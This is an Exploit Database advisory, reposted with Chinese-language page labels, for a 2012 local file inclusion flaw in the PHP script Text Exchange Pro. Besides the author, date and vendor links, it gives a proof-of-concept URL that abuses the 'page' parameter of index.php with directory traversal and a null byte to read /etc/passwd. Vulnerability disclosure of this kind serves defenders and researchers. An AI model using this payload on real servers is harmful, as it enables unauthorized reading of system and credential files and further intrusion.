Text Exchange Pro – ‘index.php’ Local File Inclusion

• Exploit Database
• 53 阅读

• 作者： Yakir Wizman
  日期： 2012-08-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20787/

• -----------------------------------------------------------
  Text Exchange Pro (index.php page) Local file inclusion
  Bug discovered by Yakir Wizman
  Date 24/08/2012
  Vendor Homepage - http://www.phpwebscripts.com/text-exchange-pro/
  Demo - http://www.scripts-demo.com/textexchangepro/
  ISRAEL
  -----------------------------------------------------------
   Author will be not responsible for any damage.
  -----------------------------------------------------------
  
  About the Application
  -----------------------------------------------------------
  Text Exchange Pro is an unique PHP script for running your own text link exchange system.
  
  
  Proof Of Conecpt
  -----------------------------------------------------------
  Local file inclusion (Severity is high)
  Vulnerable URL	: http://server/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00